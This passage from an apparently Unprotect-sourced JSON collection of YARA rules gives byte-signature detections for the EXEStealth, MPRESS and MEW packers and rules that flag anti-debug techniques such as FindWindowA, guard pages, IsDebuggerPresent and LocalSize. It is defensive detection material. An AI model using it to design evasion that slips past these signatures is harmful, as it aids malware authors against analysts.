02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 74 28 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_275_WebtoolMaster_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C9 B4 4E CD 21 73 02 FF ?? BA ?? 00 B8 ?? 3D CD 21 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_276_Unregistered_WebtoolMaster_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_276_Unregistered_WebtoolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 53 68 61 72 65 77 61 72 65 20 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_275_WebtoolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 90 60 90 E8 00 00 00 00 5D 81 ED F7 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9 96 0C 00 00 90 8D BD 74 28 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ExeStealth_WebToolMaster_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule EXEStealth_v275a_WebtoolMaster_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 82,
            "key": "yara_detect_findwindow",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_FindWindow",
            "rule": "rule Detect_FindWindowA_iat {\r\n\tmeta:\r\n\t\tAuthor = \"http://twitter.com/j0sm1\"\r\n\t\tDescription = \"it's checked if FindWindowA() is imported\"\r\n\t\tDate = \"20/04/2015\"\r\n\t\tReference = \"http://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide#OllyFindWindow\"\r\n\tstrings:\r\n\t\t$ollydbg = \"OLLYDBG\"\r\n\t\t$windbg = \"WinDbgFrameClass\"\r\n\tcondition:\r\n\t\tpe.imports(\"user32.dll\",\"FindWindowA\") and ($ollydbg or $windbg)\r\n}"
        },
        {
            "id": 68,
            "key": "yara_detect_guardpages",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_GuardPages",
            "rule": "rule Detect_GuardPages: AntiDebug {\r\n    meta: \r\n        description = \"Detect Guard Pages as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"GetSystemInfo\" fullword ascii\r\n        $2 = \"VirtualAlloc\" fullword ascii\r\n        $3 = \"RtlFillMemory\" fullword ascii\r\n        $4 =\"VirtualProtect\" fullword ascii\r\n        $5 =\"VirtualFree\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and 4 of them \r\n}"
        },
        {
            "id": 67,
            "key": "yara_detect_isdebuggerpresent",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_IsDebuggerPresent",
            "rule": "rule Detect_IsDebuggerPresent : AntiDebug {\r\n    meta:\r\n        author = \"naxonez\"\r\n        reference = \"https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara\"\r\n    strings:\r\n\t$ =\"IsDebugged\"\r\n    condition:\r\n        uint16(0) == 0x5A4D and filesize < 1000KB and any of them\r\n}"
        },
        {
            "id": 81,
            "key": "yara_detect_localsize",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_LocalSize",
            "rule": "rule Detect_LocalSize: AntiDebug {\r\n    meta: \r\n        description = \"Detect LocalSize as anti-debug\"\r\n        author = \"Unprotect\"\r\n        comment = \"Experimental rule\"\r\n    strings:\r\n        $1 = \"LocalSize\" fullword ascii\r\n    condition:   \r\n       uint16(0) == 0x5A4D and filesize < 1000KB and $1\r\n}"
        },
        {
            "id": 103,
            "key": "yara_detect_mpress",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_MPRESS",
            "rule": "rule MPRESS_V097_V099_MATCODE_Softwarenbsp_nbsp_SignByfly_20080416: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 49 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 28 AC 0A C0 74 23 8A C8 24 3F C1 E0 10 66 AD 80 E1 40 74 0F 8B D6 8B CF 03 F0 E8 60 00 00 00 03 F8 EB D8 8B C8 F3 A4 EB D2 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 69 FF FF FF B0 E9 AA B8 45 01 00 00 AB E8 00 00 00 00 58 05 A3 00 00 00 E9 93 00 00 00 53 56 57 8B F9 8B F2 8B DA 03 D8 51 55 33 C0 8B EB 8B DE 2B D2 2B C9 EB 4F 3B DD 73 6C 2B C9 66 8B 03 8D 5B 02 8A CC 80 E4 0F 0B C0 75 02 B4 10 C0 E9 04 80 C1 03 80 F9 12 72 19 8A 0B 66 83 C1 12 43 66 81 F9 11 01 72 0B 66 8B 0B 81 C1 11 01 00 00 43 43 8B F7 2B F0 F3 A4 12 D2 74 0A 72 B9 8A 03 43 88 07 47 EB F2 3B DD 73 1D 0A 13 F9 74 03 43 EB E6 8B 43 01 89 07 8B 43 05 89 47 04 8D 5B 09 8D 7F 08 33 C0 EB DF 5D 8B C7 59 2B C1 5F 5E 5B C3 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V107_V125_MATCODE_Softwarenbsp_nbsp_SignByfly_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 9E 02 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 9A 02 00 00 AB E8 00 00 00 00 58 05 1C 02 00 00 E9 0C 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V107_V125_MATCODE_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 9E 02 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 9A 02 00 00 AB E8 00 00 00 00 58 05 1C 02 00 00 E9 0C 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V200_V20X_MATCODE_Software_20090423: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 ?? ?? ?? ?? 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 88 04 31 75 F6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V085_V092_MATCODE_Softwarenbsp_nbsp_SignByfly_20080414: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 48 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 28 AC 0A C0 74 23 8A C8 24 3F C1 E0 10 66 AD 80 E1 40 74 0F 8B D6 8B CF 03 F0 E8 5F 00 00 00 03 F8 EB D8 8B C8 F3 A4 EB D2 5E 5A 83 EA 05 2B C9 3B CA 73 25 8B D9 AC 41 24 FE 3C E8 75 F2 83 C1 04 AD 0B C0 78 06 3B C2 73 E6 EB 06 03 C3 78 E0 03 C2 2B C3 89 46 FC EB D7 E8 00 00 00 00 5F 81 C7 6A FF FF FF B0 E9 AA B8 44 01 00 00 AB E8 00 00 00 00 58 05 A3 00 00 00 E9 93 00 00 00 53 56 57 8B F9 8B F2 8B DA 03 D8 51 55 33 C0 8B EB 8B DE 2B D2 2B C9 EB 4F 3B DD 73 6C 2B C9 66 8B 03 8D 5B 02 8A CC 80 E4 0F 0B C0 75 02 B4 10 C0 E9 04 80 C1 03 80 F9 12 72 19 8A 0B 66 83 C1 12 43 66 81 F9 11 01 72 0B 66 8B 0B 81 C1 11 01 00 00 43 43 8B F7 2B F0 F3 A4 12 D2 74 0A 72 B9 8A 03 43 88 07 47 EB F2 3B DD 73 1D 0A 13 F9 74 03 43 EB E6 8B 43 01 89 07 8B 43 05 89 47 04 8D 5B 09 8D 7F 08 33 C0 EB DF 5D 8B C7 59 2B C1 5F 5E 5B C3 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V071a_V075b_MATCODE_Softwarenbsp_nbsp_SignByfly_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { 57 56 53 51 52 55 E8 10 00 00 00 E8 7A 00 00 00 5D 5A 59 5B 5E 5F E9 84 01 00 00 E8 00 00 00 00 58 05 84 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 AD 2B C8 03 F1 8B C8 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 AC 0A C0 74 37 8A C8 24 3F 80 E1 C0 C1 E0 10 66 AD 80 F9 C0 74 1E F6 C1 40 75 0A 8B C8 2B C0 F3 AA 75 FC EB D9 8B D6 8B CF 03 F0 E8 8F 00 00 00 03 F8 EB CA 8B C8 F3 A4 75 FC EB C2 C3 E8 00 00 00 00 5F 81 C7 71 FF FF FF B0 E9 AA B8 9A 01 00 00 AB 2B FF E8 00 00 00 00 58 05 FE 00 00 00 8B 78 08 8B D7 8B 78 04 0B FF 74 53 8B 30 03 F0 2B F2 8B EE 8B C2 8B 45 3C 03 C5 8B 48 34 2B CD 74 3D E8 00 00 00 00 58 05 DD 00 00 00 8B 10 03 F2 03 FE 2B C0 AD 3B F7 73 25 8B D8 AD 3B F7 73 1E 8B D0 83 EA 08 03 D6 66 AD 0A E4 74 0B 25 FF 0F 00 00 03 C3 03 C5 29 08 3B F2 73 D8 EB E9 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V097_V099_MATCODE_Software_20080416: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 49 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 28 AC 0A C0 74 23 8A C8 24 3F C1 E0 10 66 AD 80 E1 40 74 0F 8B D6 8B CF 03 F0 E8 60 00 00 00 03 F8 EB D8 8B C8 F3 A4 EB D2 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 69 FF FF FF B0 E9 AA B8 45 01 00 00 AB E8 00 00 00 00 58 05 A3 00 00 00 E9 93 00 00 00 53 56 57 8B F9 8B F2 8B DA 03 D8 51 55 33 C0 8B EB 8B DE 2B D2 2B C9 EB 4F 3B DD 73 6C 2B C9 66 8B 03 8D 5B 02 8A CC 80 E4 0F 0B C0 75 02 B4 10 C0 E9 04 80 C1 03 80 F9 12 72 19 8A 0B 66 83 C1 12 43 66 81 F9 11 01 72 0B 66 8B 0B 81 C1 11 01 00 00 43 43 8B F7 2B F0 F3 A4 12 D2 74 0A 72 B9 8A 03 43 88 07 47 EB F2 3B DD 73 1D 0A 13 F9 74 03 43 EB E6 8B 43 01 89 07 8B 43 05 89 47 04 8D 5B 09 8D 7F 08 33 C0 EB DF 5D 8B C7 59 2B C1 5F 5E 5B C3 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V085_V092_MATCODE_Software_20080414: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 48 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 28 AC 0A C0 74 23 8A C8 24 3F C1 E0 10 66 AD 80 E1 40 74 0F 8B D6 8B CF 03 F0 E8 5F 00 00 00 03 F8 EB D8 8B C8 F3 A4 EB D2 5E 5A 83 EA 05 2B C9 3B CA 73 25 8B D9 AC 41 24 FE 3C E8 75 F2 83 C1 04 AD 0B C0 78 06 3B C2 73 E6 EB 06 03 C3 78 E0 03 C2 2B C3 89 46 FC EB D7 E8 00 00 00 00 5F 81 C7 6A FF FF FF B0 E9 AA B8 44 01 00 00 AB E8 00 00 00 00 58 05 A3 00 00 00 E9 93 00 00 00 53 56 57 8B F9 8B F2 8B DA 03 D8 51 55 33 C0 8B EB 8B DE 2B D2 2B C9 EB 4F 3B DD 73 6C 2B C9 66 8B 03 8D 5B 02 8A CC 80 E4 0F 0B C0 75 02 B4 10 C0 E9 04 80 C1 03 80 F9 12 72 19 8A 0B 66 83 C1 12 43 66 81 F9 11 01 72 0B 66 8B 0B 81 C1 11 01 00 00 43 43 8B F7 2B F0 F3 A4 12 D2 74 0A 72 B9 8A 03 43 88 07 47 EB F2 3B DD 73 1D 0A 13 F9 74 03 43 EB E6 8B 43 01 89 07 8B 43 05 89 47 04 8D 5B 09 8D 7F 08 33 C0 EB DF 5D 8B C7 59 2B C1 5F 5E 5B C3 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V077b_MATCODE_Softwarenbsp_nbsp_SignByfly_20080313: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 0B 00 00 00 E8 77 00 00 00 61 E9 75 01 00 00 E8 00 00 00 00 58 05 75 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 AD 2B C8 03 F1 8B C8 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 3A AC 0A C0 74 35 8A C8 24 3F 80 E1 C0 C1 E0 10 66 AD 80 F9 C0 74 1C F6 C1 40 75 08 8B C8 2B C0 F3 AA EB D7 8B D6 8B CF 03 F0 E8 7E 00 00 00 03 F8 EB C8 8B C8 F3 A4 75 FC EB C0 C3 E8 00 00 00 00 5F 81 C7 79 FF FF FF B0 E9 AA B8 81 01 00 00 AB 2B FF E8 00 00 00 00 58 05 ED 00 00 00 8B 78 08 8B D7 8B 78 04 0B FF 74 42 8B 30 03 F0 2B F2 8B EE 8B 48 10 2B CD 74 33 8B 50 0C 03 F2 03 FE 2B C0 AD 3B F7 73 25 8B D8 AD 3B F7 73 1E 8B D0 83 EA 08 03 D6 66 AD 0A E4 74 0B 25 FF 0F 00 00 03 C3 03 C5 29 08 3B F2 73 D8 EB E9 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V101_MATCODE_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 ?? ?? ?? ?? 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 B2 02 00 00 AB E8 00 00 00 00 58 05 34 02 00 00 E9 24 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V071a_V075b_MATCODE_Software_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { 57 56 53 51 52 55 E8 10 00 00 00 E8 7A 00 00 00 5D 5A 59 5B 5E 5F E9 84 01 00 00 E8 00 00 00 00 58 05 84 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 AD 2B C8 03 F1 8B C8 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 AC 0A C0 74 37 8A C8 24 3F 80 E1 C0 C1 E0 10 66 AD 80 F9 C0 74 1E F6 C1 40 75 0A 8B C8 2B C0 F3 AA 75 FC EB D9 8B D6 8B CF 03 F0 E8 8F 00 00 00 03 F8 EB CA 8B C8 F3 A4 75 FC EB C2 C3 E8 00 00 00 00 5F 81 C7 71 FF FF FF B0 E9 AA B8 9A 01 00 00 AB 2B FF E8 00 00 00 00 58 05 FE 00 00 00 8B 78 08 8B D7 8B 78 04 0B FF 74 53 8B 30 03 F0 2B F2 8B EE 8B C2 8B 45 3C 03 C5 8B 48 34 2B CD 74 3D E8 00 00 00 00 58 05 DD 00 00 00 8B 10 03 F2 03 FE 2B C0 AD 3B F7 73 25 8B D8 AD 3B F7 73 1E 8B D0 83 EA 08 03 D6 66 AD 0A E4 74 0B 25 FF 0F 00 00 03 C3 03 C5 29 08 3B F2 73 D8 EB E9 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V077b_MATCODE_Software_20080313: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 0B 00 00 00 E8 77 00 00 00 61 E9 75 01 00 00 E8 00 00 00 00 58 05 75 01 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 AD 2B C8 03 F1 8B C8 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 2B C0 3B FE 73 3A AC 0A C0 74 35 8A C8 24 3F 80 E1 C0 C1 E0 10 66 AD 80 F9 C0 74 1C F6 C1 40 75 08 8B C8 2B C0 F3 AA EB D7 8B D6 8B CF 03 F0 E8 7E 00 00 00 03 F8 EB C8 8B C8 F3 A4 75 FC EB C0 C3 E8 00 00 00 00 5F 81 C7 79 FF FF FF B0 E9 AA B8 81 01 00 00 AB 2B FF E8 00 00 00 00 58 05 ED 00 00 00 8B 78 08 8B D7 8B 78 04 0B FF 74 42 8B 30 03 F0 2B F2 8B EE 8B 48 10 2B CD 74 33 8B 50 0C 03 F2 03 FE 2B C0 AD 3B F7 73 25 8B D8 AD 3B F7 73 1E 8B D0 83 EA 08 03 D6 66 AD 0A E4 74 0B 25 FF 0F 00 00 03 C3 03 C5 29 08 3B F2 73 D8 EB E9 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V107_V12X_MATCODE_Software_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 9E 02 00 00 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 9A 02 00 00 AB E8 00 00 00 00 58 05 1C 02 00 00 E9 0C 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MPRESS_V101_MATCODE_Softwarenbsp_nbsp_SignByfly_20080730: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 05 ?? ?? ?? ?? 8B 30 03 F0 2B C0 8B FE 66 AD C1 E0 0C 8B C8 50 AD 2B C8 03 F1 8B C8 57 51 49 8A 44 39 06 74 05 88 04 31 EB F4 88 04 31 8B D6 8B CF E8 56 00 00 00 5E 5A 83 EA 05 2B C9 3B CA 73 26 8B D9 AC 41 24 FE 3C E8 75 F2 43 83 C1 04 AD 0B C0 78 06 3B C2 73 E5 EB 06 03 C3 78 DF 03 C2 2B C3 89 46 FC EB D6 E8 00 00 00 00 5F 81 C7 8D FF FF FF B0 E9 AA B8 B2 02 00 00 AB E8 00 00 00 00 58 05 34 02 00 00 E9 24 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 106,
            "key": "yara_detect_mew",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Mew",
            "rule": "rule Mew_11_SE_v12_Eng_Northfox_: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_10_V10_Eng_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v10_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_12: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule _PseudoSigner_02_MEW_11_SE_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 09 00 00 00 00 00 00 02 00 00 00 0C 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_12_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 0C ?? ?? ?? 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v11: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_11_SE_v12: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { E9 ?? ?? ?? FF 0C ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 0C ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MEW_11_SE_11_Northfox_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 ?? ?? ?? ?? 00 00 00 02 00 00 00 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MEW_10_Northfox: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Mew_501_NorthFox_HCC: PEiD\r\n{\r\n    strings:\r\n        $a = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D }\r\n        $b = { BE 5B 00 40 00 AD 91 AD 93 53 AD 96 56 5F AC C0 C0 ?? 04 ?? C0 C8 ?? AA E2 F4 C3 00 ?? ?? 00 ?? ?? ?? 00 00 10 40 00 4D 45 57 20 30 2E 31 20 62 79 20 4E 6F 72 74 68 66 6F 78 00 4D 45 57 20 30 2E 31 20 